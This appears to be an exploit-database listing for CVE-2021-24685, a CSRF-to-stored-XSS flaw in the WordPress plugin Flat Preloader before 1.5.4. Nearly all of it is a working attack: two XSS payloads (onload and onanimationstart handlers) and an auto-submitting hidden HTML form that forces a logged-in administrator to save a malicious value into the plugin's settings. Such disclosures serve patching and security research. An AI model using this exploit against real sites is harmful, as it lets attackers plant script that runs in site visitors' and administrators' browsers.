Exploit for Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting CVE-2021-24685

Name: Exploit for Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting CVE-2021-24685
Rating: 5 (289 reviews)

2021-09-28 | CVSS 5.0

## https://sploitus.com/exploit?id=WPEX-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F
Depending on the payload, the XSS will be triggered either in the frontend or backend:

Frontend: " onload=alert(/XSS/)//
Backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)//

<form action="https://example.com/wp-admin/options-general.php?page=flat-preloader" method="post" id="csrf">
<input type="hidden" name="preloader-style" value="windows-10/circles-menu-1.gif">
<input type="hidden" name="preloader-display" value="all">
<input type="hidden" name="preloader[custom_image_url]" value="">
<input type="hidden" name="preloader[text_under_icon]" value="">
<input type="hidden" name="preloader[delay_time]" value="">
<input type="hidden" name="preloader[alt]" value='PAYLOAD'>
<input type="hidden" name="save-option" value="Save Changes">
</form>
<script>csrf.submit()</script>